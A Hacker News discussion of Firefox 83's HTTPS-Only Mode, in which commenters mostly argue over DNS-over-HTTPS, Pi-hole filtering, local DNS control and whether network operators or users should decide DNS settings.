Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Firefox 83 introduces HTTPS-Only Mode (blog.mozilla.org)
950 points by tomwas54 on Nov 17, 2020 | hide | past | favorite | 508 comments


I’m surprised at the negative knee-jerk reaction. I actually love this idea immediately. It encapsulates something I kind of already wanted when using HTTPS Everywhere.

This doesn’t guarantee the transport is end-to-end secure; I’m sure plenty will strip the encryption at an LB and then possibly send it back over the internet. But, I think it’s a good addition nevertheless. Here’s to hoping for more DoH and encrypted SNI adoption as well. No good reason to leave anything unencrypted if it doesn't have to be.

(I’m less happy with Firefox’s approach to DoH rollout, but I’m still glad to see DoH gaining some traction. Let’s hope the end result is worth it...)


I want my OS to do DNS - including DOH, not my browser. I want a single source for my DNS

I want my network to tell me a DNS server to use. As I own my computer I can override that, but much of the time I want to use the network provided DNS server.


> I want my OS to do DNS - including DOH, not my browser.

The cat is out the bag, so to speak. I foresee a lot of adware, spyware, and malware leveraging DoH now to evade just about every DNS-based monitoring/blocking/provisioning solutions.

Anyway, the right layer to monitor for Internet traffic has always been the IP layer (VPNs notwithstanding).


This has always felt like a strange concern to me. It’s a bit like refusing to have gloves in your house, so that a burglar can’t borrow your gloves to avoid leaving fingerprints.

Adware, spyware, and malware has always had the ability to avoid system DNS. At its most basic, they could hardcode lists of IPs into their malicious code. At its most complex, the same building blocks that DoH/DoT use were available to them: they could build similar tools that tunnel over HTTPS/SSH/etc, whichever protocol they felt was least conspicuous on their target system. Drop a list of hostnames into a pastebin post, tell your malware to check the list for updates, profit.

DoH in Firefox simply makes the above issue harder to ignore. Before this, an enterprise or individual sysadmin could implement DNS inspection at the border, see logs showing their users browsing naughty websites, and feel like they’d made progress. But they’d always be blind to attackers (or nefarious users) who just didn’t bother using the stock DNS offering to bootstrap their hijinks. Detecting that has always required device-level monitoring or further MITM of traffic; learning about DoH makes that more obvious to sysadmins, but it doesn’t materially change what adversaries were able to do already.


> At its most basic, they could hardcode lists of IPs into their malicious code.

Which makes the malware more fragile, because the hosts are often compromised machines themselves, or are the targets of takedowns. If they include only one IP at a time (as they can do with DNS) then when that machine gets cleaned by the owners, they have no way to switch to another one. If they list several machines then anyone analyzing the malware has a list of multiple compromised machines to go have them all cleaned at once. Also, then you can add the IP address to a block list and they can't update it like they can with DNS.

> At its most complex, the same building blocks that DoH/DoT use were available to them: they could build similar tools that tunnel over HTTPS/SSH/etc, whichever protocol they felt was least conspicuous on their target system.

Malicious javascript in a browser doesn't have access to SSH or similar. And that's assuming their code can even reach your machine if your Pi-hole is blocking the DNS name of the server hosting it.

> DoH in Firefox simply makes the above issue harder to ignore.

It makes it harder to prevent. Someone sends the user an email link to a URL containing an unpatched browser exploit or a link to a malicious binary. If the Pi-hole blocks the domain and/or the IP address in the email, the attack is prevented. If the browser bypasses the Pi-hole, you have malicious code actually running on the user's machine, and that's a much bigger problem.


Hardcoding the IP certainly has limitations but that is only the easiest example of bypassing DNS-based content blocking. A slightly less trivial solution where you grab the IP out of a file over HTTP instead could be easily implemented by any junior developer.

> Also, if they use an IP address then they can't be using SNI to host it on the same IP address as several other domains

Sure they can, just hardcode the "Host" header value as well

> Malicious javascript in a browser doesn't have access to SSH or similar.

They can access HTTP though, which is more than enough.


> A slightly less trivial solution where you grab the IP out of a file over HTTP instead could be easily implemented by any junior developer.

Over HTTP from what? You would need name resolution or a hard-coded IP address to make an HTTP request.

And the thing this is preventing isn't just what the malware does after you're already infected, it's the path to receiving malware to begin with.


GitHub, PyPi, NPM, etc are all great options for hosting dynamic content from a fixed location which looks benign to scanning.

For non-tech companies, replace with any relatively popular wiki.

The goal is “make a connection over HTTPS or other normal-looking protocol, to a destination that is both justifiability relevant for normal user traffic and allows the attacker to seed the next-step”. And it turns out there are lots of sites that fit that bill.


> GitHub, PyPi, NPM, etc are all great options for hosting dynamic content from a fixed location which looks benign to scanning.

They're not going to leave malware payloads sitting there. Pastebins etc. get abused as malware command-and-control systems all the time, and of course some gets through, but countermeasures happen. Whereas for a DoH server it would be operating as designed.


As a parallel reply noted, the goal isn’t to host a payload on GitHub or a pastebin.

The issue is “how do I tell my bootstrapper where to get a payload from in an inconspicuous way”. To solve that, you find a benign site with existing business purpose (like GitHub or a wiki or a pastebin), and you insert your desired IP address. So maybe you add it as new file in a repo under your cool new fake GitHub account, and the file just says “1.2.3.4”. Now you can tell your bootstrapper to make an HTTPS request for that file, which looks boring to any introspection because outbound requests to GitHub are normal, and to use the resulting IP to request the payload.

Your compromised payload host gets shut down? Spin up a new one, and update the file on GitHub with the new IP.


> They're not going to leave malware payloads sitting there. They do though, I usually check where spam emails lead me to as a curiosity, and the payload is sometimes hosted on github.

A simple GET request to https://github.com/adkafdjsh20/cool_repo/blob/master/dns.txt would work for DNS purposes.

Also, there are countermeasures for malware domains themselves, as you can report them to registrars.


Domains can be seized too, nothing is foolproof.


And don't you similarly also need name resolution or a hard-coded IP address in order to reach a malicious DoH server?


It's not a malicious DoH server. It's just any DoH server which is bypassing your Pi-hole and therefore resolves the malicious name instead of blocking it.


That's not the point. Don't you need to hardcode some kind of identifier in order to use your malware's preferred DoH server instead of the user's preferred one (which could have content blocking applied)?


The issue is with Firefox overriding the system DNS with its own by default, when the system DNS may have content blocking applied and the Firefox default may not.


I think if the user wants that, they should choose to apply it. Not the network operator. Same as how I wouldn't want my network operator inspecting my HTTPS traffic for malware.


I'm not sure why HN won't allow me to reply to ori_b's question below you, however DoH in Firefox (and in Chrome) have clearly spelled out ways to disable it at the network level for those folks who are network operators and want to restrict it due to interference in filtering or split-horizon DNS.

https://support.mozilla.org/en-US/kb/configuring-networks-di...

Someone previously mentioned Pi-Hole. Pi-Hole provides the DoH canary domain in it's default configuration, therefore if you run an up to date Pi-Hole on your network you will have DoH disabled. It is recommended (and there are good instructions on the Pi-Hole website) to set up cloudflared or a similar DNS resolver which implements DoH as the backend to Pi-Hole, allowing it to use DoH when leaving your network but still act as the local network's authoritative name server.

If you choose to be a network operator, there are some additional complexities you must think about. For those (majority of) users that choose not to be network operators, DoH is nearly transparent for them and provides significantly improved security and privacy by preventing local cache poisoning, DNS injection, and DNS snooping attacks on their browsing.

Additionally, while the default in Firefox is a non-filtering endpoint currently, you can manually configure the use of a filtering DoH endpoint like those provided by CloudFlare 1.1.1.1 for Families if you wanted to do so. Nothing prevents this, and it can be configured via policies network-wide in Firefox using the enterprise policy mechanisms.


> DoH in Firefox (and in Chrome) have clearly spelled out ways to disable it at the network level for those folks who are network operators and want to restrict it due to interference in filtering or split-horizon DNS.

I still don't really understand this. Yes, it solves that problem, but how is it not also defeating the entire premise? If you had a DNS server from an adversarial network operator, they could just resolve the canary. So it means the browser's DoH is only secure if you can trust your network operator's DNS, at which point, what was its purpose supposed to be?

And the fear is that at some point someone is going to try to "correct" that by removing the check for the canary.


Right now is a transition phase, it is absolutely intended that some other mechanism becomes available in the future which is more resilient. The canary domain provides a clear pathway though for existing Do53 configurations to prevent DoH when necessary.

There's still some specific cases where DoH is problematic, but these are being eliminated over time as the technology matures. As an example of this, split horizon DNS in corporate environments is a good choice. Right now, the only realistic way to provide this is with Do53, so DoH must be disabled, but with Microsoft adding DoH support into the Windows 10 DNS Client, they are likely soon going to also support it on Windows DNS Server, which would enable businesses to make use of DoH internally and to simply set the endpoint by enterprise policies.

DoH is a few different things, but at it's most basic it's transport security for DNS, which is a fundamentally good idea any way you slice it. At some point in the future, plaintext DNS will effectively cease to exist and that's a /good thing/. There are several different implementations of encrypted DNS in the wild besides DoH (DoT and DNScrypt as examples), whichever you choose, any option that encrypts DNS both on your local network and across external networks improves privacy and security.

It takes a pretty long time to transition fundamental protocols like this, but a future where more things are sent across encrypted transports is a good future. Plaintext DNS is incredibly vulnerable, and it's also in an area which isn't heavily visible to most users, which is not a recipe for success.


The user can choose to ignore the canary in the app's settings (not the default though), or they could ignore it at an OS level. And it is indeed intended to be removed and replaced with a different mechanism eventually


The main thing I don’t want is to send all my browsing data to Cloudflare or similar “public” DNS operator outside my jurisdiction.


Currently, Firefox only has DoH rolled out in the US, so CloudFlare is in that same jurisdiction. Additionally, all DoH providers included in Firefox must meet the Trusted Recursive Resolver (TRR) guidelines, sign a contract to that effect, and undergo third-party audits to ensure they meet the requirements.

https://wiki.mozilla.org/Security/DOH-resolver-policy

This is all publicly documented. As Mozilla rolls DoH out to other regions they will add additional TRR partners and CloudFlare won't be the only choice.


While I'm not glad about the current Cloudflare monopoly on encrypted DNS, and I hope more providers spring up soon, I'm inclined to think that Cloudflare are much better able to maintain privacy and resist government intervention (where possible) compared to any local operator.


The user can do whatever they want. It's their machine. But you know perfectly well that almost everybody is going to take the default because they don't even know what the setting does, and end up disabling content blocking when they didn't intend to.

And in many cases the user is the network operator. What the browser is doing is taking away the mechanism to set local policy. Ordinarily you hand out the DNS you want your devices to use via DHCP, and they use it. If you move that from the OS to the application and the application ignores the DHCP setting by default, now you've lost the ability to set a uniform policy for all your devices and applications. It becomes an arduous manual process to change the setting in every application on every device, and then you probably miss half of them.


Yes, and I am saying the default should be to use a guaranteed source of truth and not something set by the network operator's policy. Same as how your trusted root CA certificates don't come from a network policy for example. I don't think we should be making a convention of inspecting users' private traffic, regardless of whether it is by default or by opt-in, under the guise of protecting them from malware.

DNS has historically been set by network policy so that it's easy for network operators to map hostnames to their local network resources. The point of the design wasn't to enable traffic monitoring or content blocking by altering the results for hosts that aren't under your control.


The problem is "guaranteed source of truth" doesn't exist. When the network operator is you, or your family/company, you may trust the local DNS to respect your privacy more than you do Cloudflare. Not all names are intended to resolve the same everywhere -- sometimes the local DNS will give the RFC1918 address for a local server instead of the public one, or have a set of local names that are only accessible on the local network. How do you propose to globally resolve the reverse lookup zones for 10.0.0.0/8 et al?


> you may trust the local DNS to respect your privacy more than you do Cloudflare

For most people, their local DNS is someone like Comcast or Verizon, way less trustworthy than CloudFlare. We shouldn't reduce the privacy of the majority of people just to increase it for a small minority of people by default.


If the DNS set by DHCP were only used for local network resources and not internet resources, I wouldn't have a problem with that. That is what it is there for.


There isn't a bifurcation in the namespace for local resources. Any given name could resolve to a local address or a public one. There isn't even anything requiring a local-only server to have a private address -- it's common to have a public IPv6 address for something which is still only resolvable or accessible from the local network.


I'm the user and the network operator. Can you give me a comprehensive list of places I need to configure, and notify me when another place software can go around my configuration is added?


I never said there wouldn't be an increased configuration burden for that kind of setup. There was also an increased configuration burden when we moved to widespread HTTPS, but the benefits outweighed the costs.


As a user, what is the increased administration burden for http?

Are you referring to the whole CA system being an untrustworthy racket?


As a user, what is the increased admin burden for using DoH, assuming you don't want to implement network level content blocking? Basically none.

What is the burden for using HTTPS assuming you DO want to be able to inspect and block HTTPS resources at a network level? Very extensive compared to plain HTTP.


>assuming you don't want to implement network level content blocking? //

Who doesn't want that? I have a pihole (and use OpenDNS). Bypassed it all yesterday, as an experiment, to look at an anime site my eldest started using and immediately was hit with a pretty impressive and convincing phishing attempt (mimicking my ISP).

Pretty much all of us on HN seem to use some form of 'DNS' based filtering (pihole, or even just hosts file). UK ISPs offer DNS based filtering as a default (and have to filter some pages by law, and are encouraged to filter others [through threat of law]) ... but a lot of people want that, many many families, schools, businesses.

Certainly I don't want it to be easier for advertising and malware to bypass my chosen DNS-style filtering.


I don't want it and I don't recommend it to my peers. I also don't think DNS-based content blocking is really as popular as the PiHole community would say. I use client-side content blocking like uBO instead, which I imagine is overwhelmingly the more common solution, and it is also more powerful and effective (and easier to use).

UK ISPs having mandatory DNS blocking is a great example of why DoH is important. The user should decide what they want, not the network operator.

Perhaps widespread use of encryption technologies means I can't do content blocking on proprietary appliances like the Chromecast for example. I think that's a necessary evil and I just won't buy such an appliance if it's that big of a problem. Only legislation can really fix that kind of problem anyway, it doesn't really matter whether Firefox implements DoH or not.


Make the libc resolver do DoH, and drop it from firefox,half the problems go away.

The other half of the problems are around defaulting to allowing cloudflare to inspect your traffic, instead of comcast. And the lack of integrity and encryption for the rest of the DNS infrastructure. And the expansion of the complex and difficult to secure x509 certificate regime which we should be moving away from. (Something like gossamer seems to be a big step in the right direction)

I want encrypted dns, just not a half-assed hack of an implementation that is going to be impossible to fix once deployed.


I agree with you there, OS vendors should be implementing DoH. Thankfully they are finally getting around to it after pressure from browsers.

Regarding the rest of the DNS infrastructure, I agree there is more work to be done. But I see DoH/DoT/etc as a necessary step and not a "half-assed implementation" that needs to be "fixed".


That's not an issue with overriding the system DNS. It's the point of overriding the system DNS. Content blocking by anyone but the user is a bad thing, and if you the user want it, then install uBlock Origin or something.


I am not in disagreement.

> DoH in Firefox simply makes the above issue harder to ignore.

That's exactly what I mean [0]. The cat's always been there so to speak but now it is out there roaming around harder to ignore.

[0] https://news.ycombinator.com/item?id=25123487 and https://en.wikipedia.org/wiki/Script_kiddie


> The cat is out the bag, so to speak. I foresee a lot of adware, spyware, and malware leveraging DoH now to evade just about every DNS-based monitoring/blocking/provisioning solutions.

But tunnelling X in Y is not new at all and has a long tradition (even in regular protocol design). Is this really a shift waiting to happen in malware? As I would think, this has been available all along. Except for browser-based malware.


Right. It is ridiculous to say that DoH enables malware because it has always been trivial to bypass DNS-based access control with or without technologies like DoH. In fact, if anything, using DoH would be a particularly cumbersome way of doing it when there are many simpler solutions. Like for example, just putting an IP in a text file on a REST endpoint.


I think the best case I can make is that it's not about the ability to tunnel DNS, it's that there's now many fast highly-available public DoH resolvers that bypass DNS filtering for free. A hypothetical malware author just needs to use any of them rather than set up their own tunnel.


True, this aspect of the situation could make malware use cases a bit simpler to operate/maintain.


I've always assumed any device or program I don't control will bypass anything I tell it to use and tunnel all it's evil traffic.

It does feel the world is moving away from a multi-level network to run everything over TLS/TCP (and probably eventually mainly TLS/UDP), taking away the power from me as a network and device owner, and giving it to the developers


If only the OS could terminate TLS and allow to filter decrypted traffic locally.


IBM z/OS has an interesting feature: AT-TLS (Application Transparent TLS). An app uses the OS sockets API to create plaintext sockets, and the OS adds TLS to them (based on policies configured by the sysadmin) transparent to the application. (There are IOCTLs that apps can call to discover this is going on, turn it on/off, configure it, etc, but the whole idea is you can add TLS support to some legacy app without needing any code changes, so adding those IOCTL calls to your app is totally optional.)

In some parallel universe, TLS would have been part of TCP not a separate protocol and the Berkeley sockets implementation in the OS kernel would handle all encryption, certificate validation, etc, on behalf of applications. AT-TLS is a bit like visiting that parallel universe


I think this is actually making a comeback for the server room; https://www.kernel.org/doc/html/latest/networking/tls.html for example. I _think_ the point of these is hardware TLS accelerators.


Linux kernel TLS, at least at the moment, only does the symmetric encryption part in the kernel, and the TLS handshake, certificate validation, has to be provided by user space. This is different from z/OS AT-TLS in which the OS does the TLS handshake, certificate validation, etc as well.

(Strictly speaking, I'm not sure if AT-TLS actually is implemented in the OS kernel – or "nucleus" to use the z/OS terminology – it may actually be implemented somewhere else, say in the C library. I know some of it is actually implemented by a daemon called PAGENT. But, from the application programmers viewpoint, it is provided by the OS, however exactly the OS provides it.)


I was thinking more of devices I don't control - IOT stuff that requires internet access to function (like a box to watch netflix). Clearly anything running on my machine is fine as it's under my control


So between the user and the network operator, who should have the final say? It seems like you're saying, "it should be the user when I'm the user and it should be the network operator when I'm the network operator". But I don't think we can have it both ways.


Generally the policy should be

1) The ISP says what should be used

2) the lan either accepts that, or the operator puts their own values

3) the device either accepts that, or the operator puts their own values

Same as object inheritence. An ISP says "use this DNS server it's nearer", the network operator says "no thanks, I'll run my own with an upstream of google as I don't like your NXDOMAIN injects", the user says "actually I'll use cloudflare because I don't trust any of you"

That's all fine, and gives the power to the user.

Exceptionally if a device doesn't allow the network settings to be overwritten for some technical reason, it should simply accept what the lan sends it.


I think there will be some contention over 1 and 2 because we're at the point where both of these entities might be trusted (at home and work) but are inherently untrustworthy.

And so browsers are saying that the path should be.

1) The browser developers say what should be used.

2) The user either accepts that or puts their own values.

Ideally I think it should actually be something like

1) The OS vendor say what should be used.

2) The user either accepts that or puts their own values.

2.1) Lan operators can offer DNS servers which the user can (always) accept or (always) reject with reject being the default.

But this whole mess with browser DoH is because OS vendors are slow to move on this. Google Android does it kinda, Windows has it in beta, Linux works but it's a little DIY.


Just point them to your http proxy and filter there all you want.


This is prevented by certificate pinning.


Only on a handful of domains. Most site admins are fearful of HPKP. The mitm proxy I am using to post this message only has to exclude a small handful of domains from mitm decrypting. A bunch of google domains, eff.org, paypal, a few mozilla domain names, dropbox and android. To my surprise, no traditional banks, no money management or stock trading sites, no "secure" portals used by law firms to share sensitive files. The sites I would expect to use pinning are the ones that do not.

On a side note, I would love to see a system that adds out-of-band validation of an entity. e.g. My bank should have a QR code behind glass on the wall that I can scan, import a key and further validate their site at the application layer, above and beyond HTTPS and CA certs.


Yep, and HTST (if you don't trust that you can use an Firefox addon to perform certificate pinning). I believe HTST got introduced in the wake of the DigiNotar debacle (listen Darknet Diaries #3). Mitmproxy also made it easy.

I guess this Mozilla Firefox change deprecates HTTPS Everywhere.

Either way, we've come a long way. For people in the Dutch security world, DigiNotar was a known joke. I knew about their terrible security (and the implications) back around 2000-2004. Although there have been more vulnerabilities too, such as Hearthbleed and POODLE.


> HTST

I'm not familiar with HTST so I went looking but didn't find anything related to the web and HTTP, so I'm guessing you meant HSTS?


Yes, thanks for the correction.


You could easily add APIs for cert pinning at the OS level. Or provide the details needed to verify with the OS -> Program call return.


Isn't this SSL offloading and done by companies to introspect the traffic?


That only works as long as the CA trusted by the user's computer is controlled by the box trying to do this.


Which shouldn't be a problem since it's the box itself doing the decryption. No need to MiTM since it's the endpoint.


If we're going to talk about the "right" thing to do then don't run closed software or anything that doesn't do what you want and the problem goes away.


Run your own DNS server locally. It's not that hard.


I'm not fully understanding how this works. Can't the user just run their own secure DOH server and tell Firefox to use that instead?


Can you elaborate? An adware app will be installed in the OS, and will proxy all DNS requests?


Apps will make DOH requests from within their apps to avoid host-based DNS blocking.


This is nothing that wasn't possible before. Taking the traditional example of hosts-blocking the Adobe activation servers, what was stopping them from just querying 1.1.1.1 from the app? Or even falling back on a hard-coded IP? Especially with IPv6, bypassing DNS-based blocks is rather trivial - the main reson we don't see it all that much is that companies simply don't care to do it. Users of PiHole and similar are usually the kinds of users who will figure out a way to block whatever they want one way or another, so there's no use in trying to stop them. Until we get hardware-enforced app signing (big middle finger to Apple here) we can block anything, regardless of DoH.


You're right, I guess the question is did they bother before. If normal DNS works fine for 95% of users, the hurdle of implementing a non-standard workaround is too much. If DOH is the norm, then the hurdle becomes lower.

Of course you can just drop a rule blocking the IP address on your firewall, which will probably work for a while.


I would argue that the hurdle of bypassing DNS-based content blocking was already so vanishingly small that it doesn't make any sense to impede useful and practical privacy technologies on that basis.

You could make the exact same kind of argument about widespread use of HTTPS for example. Do we want to allow encryption technology if it means the enemy can use it too? As a society we have agreed that encryption is a net positive even though terrorists and criminals benefit from it, but when malware uses it then that's too far?


>I would argue that the hurdle of bypassing DNS-based content blocking was already so vanishingly small [...] //

That doesn't hold up under scrutiny. My pihole blocks ~11% of domain lookups (blocking 1000 queries per day for our household), turning it off vastly increases the unwanted content. It might seem is logical a ready hurdle, but it's a hurdle that practically works.

I don't follow the reasoning that says this is a small barrier to malware so we'll remove it.

What are we, end users, getting out of routing all our domain lookups to Cloudflare and ceding control of filtering?


The next step is blocking all the traffic from all apps and whitelist the IP addresses app by app. I did it on my Android phone, a couple of phones ago. I don't remember the name of the app. It could be done on a desktop or server OS too.


That sounds like a fun way to spend your life.


At least in my case network provided DNS are the worst, Full of spyware, and tracking.


I run my own networks and my own devices, I choose what options go in my DHCP server

If I were on a hostile network (say a hotel), then sure, I'll ignore their DNS server and use my own (or indeed just punch my way out via a VPN), but most of the time I use friendly networks, and I don't want to have to configure 20 different applications on a dozen different boxes to use a DNS provider of my choice. There's a reason I use DHCP in the first place.


You are able to run own network and have the know how to do so, typical physical Firefox users cannot.

Given your knowledge you can disable or even build firefox with DoH disabled , it is a sensible default for vast majority of users who do not know what DHCP is, or control their network. It cannotis trivial configuration for people who can control and do not want the DoH service provider given by Firefox.

Also many places do not allow VPN traffic either. It is not as easy to bypass monitoring in a locked down environment like typical corporate firewalls, college campuses etc. Yes for every block in place like deep packet inspection etc there is usually some workaround but these become increasingly difficult as more stringent the blocking becomes, and having options like DoH helps users who cannot or do not know how to run VPNs.


> Given your knowledge you can disable or even build firefox with DoH disabled , it is a sensible default for vast majority of users who do not know what DHCP is, or control their network. It cannotis trivial configuration for people who can control and do not want the DoH service provider given by Firefox.

I have mixed feelings about the issue, but it's not that simple.

I run a variety of services on my LAN for my users and guests. That includes Unbound, so even though their browser doesn't know it, their queries are secure from my ISP. But more importantly I have other stuff behind hostnames (which are resolved by Unbound). For example, my guests can navigate to music/ and use a web interface to play any of the music in my library over the stereo.

Hopefully it's obvious why this is something useful to have.

Now that Firefox is intercepting DNS requests, a conversation with someone might go like this: "Oh, it's not working? Are you using Firefox? Yeah, Firefox broke this recently, let me get the IP address for you." And then I have to log in to a computer, ssh into the relevant system, and get its IP address on the LAN.

And that's just the beginning. Last I checked Cloudflare still can't resolve the archive.is / archive.today domains. Even though I use Cloudflare over TLS in Unbound, I fix this for myself and my users by sending these domains to Google instead. Anything as convenient and simplistic as Firefox just sending everything directly to Cloudflare can't do that.


If you follow the DNS specs this will not a problem. If you use *.local for local domain names DoH will never be triggered

From Mozilla documentation.

   "localhost" and names in the ".local" TLD will never be resolved via DOH. [1]
Lan based services are pretty common use case. Mozilla is hardly going to release this feature without considering this.

The Cloudflare / Archive.is point is esoteric debate and not a common occurence, DoH does support other providers than Cloudflare so not sure if this really a major concern

[1] https://wiki.mozilla.org/Trusted_Recursive_Resolver


> If you follow the DNS specs this will not a problem. If you use *.local for local domain names DoH will never be triggered

I don't think PFsense + Unbound supports appending .local to every hostname automatically, so I'd have to change every last one of my hostnames to whatever.local and that seems like a real pain. (Surely most people are not using whatever.local in their /etc/hostname, right?)

> The Cloudflare / Archive.is point is esoteric debate and not a common occurence, DoH does support other providers than Cloudflare so not sure if this really a major concern

Sure, but my general point is that there's all sorts of different reasons why it can be useful for a LAN administrator to override the remote DNS response in certain specific cases. Given that Firefox is using Cloudflare by default, the fact that you can change it also doesn't really help anything, since after all the thing I'm specifically complaining about is that stuff randomly breaks for any of your guests using Firefox.


Yes it does, you set it in System > General Setup: https://docs.netgate.com/pfsense/en/latest/config/general.ht...

Then it will automatically register them in DNS with that name: https://docs.netgate.com/pfsense/en/latest/services/dns/reso...

> The domain name from System > General Setup is used as the domain name on the hosts.

Then in the DHCP configuration, you set the domain name as well (defaults to using the general setting): https://docs.netgate.com/pfsense/en/latest/services/dhcp/ipv...

> Specifies the domain name passed to the client to form its fully qualified hostname. If the Domain Name is left blank, then the domain name of the firewall it sent to the client.

The client will automatically try adding the domain when looking up hostnames. Normally on Linux the FQDN is not specified in /etc/hostname but only in /etc/hosts.


It is perhaps reason for you(and others) not wanting migrate, however there is nothing wrong in the way DoH functionality is implemented.

Cloudflare broke a lot of traffic when the 1.1.1.1 dns server came up, google broke lot of dev setups when they got the . dev TLD, however it is not theit fault though.


The default behaviour is to fallback to the network DNS if DoH doesn't resolve the domain, so your use case would work fine.

archive.is didn't work for Cloudflare users because they purposely sabotaged the results for Cloudflare (they did actually return valid, but wrong, results).

EDIT: Although you might have a problem if the owners of the ".music" TLD decide to put something else there.


If your network allows TLS to an arbitary DOH server it allows VPN over TLS to an arbitrary server


A lot of networks block VPNs via port number + DPI, but can't really block DNS over HTTPS if it looks like a connection to any other HTTPS website.


Yes, which is why my VPNs are available on port 443 and 53, including a TLS based VPN.

Now port 53 can and often is intercepted (but sometimes it gets through when 443 doesnt)


it does not matter under what port including 443 you are running the service, deep packet inspection (DPI) can sniff out VPN traffic, perhaps you may not encountered this type of firewall as it somewhat more expensive to run both computationally and licensing wise.

It is not possible to sniff out DoH traffic via DPI as looks exactly the same as regular traffic

While running flash servers for media use in corporate environment (when flash was still a thing) back I used to run into similar problems with RTMP/ RTMPS constantly.


You can use an HTTPS "CONNECT" proxy to protect your VPN traffic in the same way (I assume that's the kind of setup they were referring to on port 443)


Why should Firefox want enable users and devices to bypass network owners configuration in this way? A company should control their network, just as a home network's owner should have control.


Because Firefox represents their users' interests and not network owners' interests which are often hostile e.g. inserting ads into pages.


For the vast majority of people, "the network" is their ISP or a random hotspot, who should absolutely be treated as a hostile adversary.


How can DNS be "full of spyware"? Or are you saying that it is used for spying on you?

But anyway, it is your decision to use them - you can use 1.1.1.1 (CloudFlare), 8.8.8.8 (Google - if you don't mind the tracking) or any other DNS provider.


I don't know what GP meant with "full of spyware" but the most popular ISP in my region (Telefónica) used to redirect to pages filled with ads when a domain couldn't be resolved. Changing to 8.8.8.8 wouldn't work because it was unencrypted, they intercepted the requests and still redirected to ads. They stopped doing it some time ago but any ISP or middle man has the ability to continue doing that if they want.


Yes this is the same thing that happens with me, all unencrypted websites are redirected to adware. On phone i use 1.1.1.1 app from cloudfare but on other devices this is still issue.


Aren't all these public DNS getting unencrypted requests, so I assume ISPs snoop the domain lookups already, regardless of Google/Cloudflare/OpenDNS/Yandex doing so.


That's the point of using DoH, to avoid sending unencrypted DNS requests so your ISP can't spy or intercept those requests. If you are using unencrypted DNS from Google/Cloudflare/etc you are just adding one more party that can see your requests. If you use DoH, in theory, you are replacing who can see your requests. In practice your ISP can still know what websites you visit thanks to unencrypted SNI or if the domain you are visiting is the only one on that IP (and probably other techniques I'm not aware of). There are many more variables than just DNS requests so if you really don't want your ISP knowing what websites you visit you have no choice but to use a VPN or Tor.


They're referring to the local network configuration.

Many sysadmins will hate this.

> Full of spyware, and tracking.

What do you use? Google?...



> I want my OS to do DNS - including DOH, not my browser. I want a single source for my DNS

I'll go further and say I want my router to handle this. It is unrealistic to expect every device on my network to natively support the standard, but it's pretty easy to have your local DNS endpoint reroute the traffic through DoH on it's way out of your network. Right now I accomplish this by running cloudflared upstream of my Pihole.


"I want a single source for my DNS."

I don't like applications that do their own DNS resolution. I use a text-only browser that relies on the OS to do DNS resolution.

But imagine your DNS is filtered. Would you still want only a single source, e.g., your ISP? In that case, wouldn't you want multiple sources?

When in a DNS-filtered environment, e.g., a hotel, DOH outside the browser can actually be useful. For example, I can retrieve all the DNS data for all the domains on HN in a matter of minutes using HTTP/1.1 pipelining from a variety of DOH providers. The data goes into a custom zone file served from an authoritative nameserver on the local network. Browsing HN is much faster and more reliable when I do not need to do recursive DNS queries to remote servers. The third party resolver cache concept is still really popular, but IME most IP addresses are long-lived/static and "TTL" is irrelevant. I rarely need to update the existing RRs in the zone files I create and the number that need to be updated is very small.

DOH servers are not the only alternative source of DNS data.

Ideally, I prefer to avoid third party DNS altogether. Nor do I even need to run a local cache. I wrote some utilities that gather DNS data "non-recursively", querying only authoritative nameservers and never setting the RD bit. It is very fast. The only true "single source" of DNS data is the zone file for the particular RR at the designated authoritative nameserver(s). Everone else is a middleman.

I am not a fan of applications doing their own DNS resolution, even if they use DOH. But I have found the existance of DOH servers, i.e., third party DNS caches served over HTTP, can be useful.


I have a root hints dns sever running in my home environment. I'd prefer to control dns at os level. I also route my mobile devices through openvpn to cover when I'm not home. I control every aspect of all my devices network traffic.


What you want would make censorship and surveillance easier against the vast majority of people. Networks I'm on shouldn't be able to tell which CloudFlare-hosted site I'm visiting, or to block some of them without blocking them all. Letting the network give me a DNS resolver instead of using a known-good one would allow exactly those bad things.


My perspective is this is my home network and this application is infringing on my freedom. I should have the right to monitor my network and my traffic. An application is a guest in my house/computer it does not set the rules.


> I should have the right to monitor my network and my traffic.

The key is that if it's really your traffic, then you can easily reconfigure Firefox so that you can monitor it. The benefit of DoH is that if someone else is using Firefox on their own computer, you can't snoop on or hijack their DNS just because they're on your network.


OK, what if you own the network? The corollary to that is 'you shouldn't be allowed to stop devices on your network from accessing malware, or exfiltrating data'.


Untrusted devices should be on a separate network where they don't have access to any data worth exfiltrating.


So you are suggesting we further centralising the web to avoid censorship and surveilance?


How is this further centralising the Web? You can still use whatever DoH provider you want (and there's plenty of them); the choice just shouldn't be tied to the network you're on.


But you don't want it tied to a specific application either. It should be an OS level setting that lets you configure what DNS to use based on circumstance. This is possible today for power users (on Linux at least) and wouldn't be hard to implement for normal users.


This is a fair point, but the reality today is that basically every OS uses the network-provided DNS servers by default, so Firefox is completely right today to ignore the OS by default. If this ever changes such that it is common for the OS to use DoH instead of the network-provided DNS servers by default, then I'd agree that Firefox should follow the OS.


Cool, that makes you one of the people that's going to keep DoH turned off. What's the problem?


The internet of crap will also use DoH and bypass my network settings.

Also, it is only a matter of time before ads (and websites) start using it to bypass browser DNS:

https://github.com/byu-imaal/dohjs


There is no reason they couldn't have done this without DoH being an available standard. Remember, DoH is just an ordinary HTTPS request. Anyone can hide almost anything in that, including their own homemade DNS.


Your concern about smart devices using DoH can be trivially avoided by not buying smart devices that use DoH, or even connect to the internet. Make sure that whatever you buy works with a local server such as Home Assistant and is actually under your own control. A system like this will be more reliable and customizable too.


Sometimes you don't own the computer on which the browser is running, e.g. public web browsing kiosk. Or else you sort of own the computer, but not the DNS.

If you work in a setting in which web surfing is intercepted, and outright breaks pages, the in-browser DNS can be a godsend.


Easily doable (at least for the browser): https://support.mozilla.org/en-US/kb/canary-domain-use-appli...


So now I have to add fake DNS records for every application that decides to do their own special snowflake thing and ignore the source of truth for what DNS server to use?

Oh joy.

I run DHCP for a reason. That reason is telling devices on my network what their settings should be. I expect those settings to be honored, not them doing the electronic equivalent of "okay boomer" and using whatever arbitrary settings they were told to by a corporation.


The reason to run DHCP is to allow devices to be configured automatically, not to restrict how they can be configured.


Software and hardware vendors need to start honoring the local configuration choices of the owner of the hardware and network. At a certain point ignoring my decisions about what can traverse my network becomes a crime and should be prosecuted as such.


You'd like Plan 9


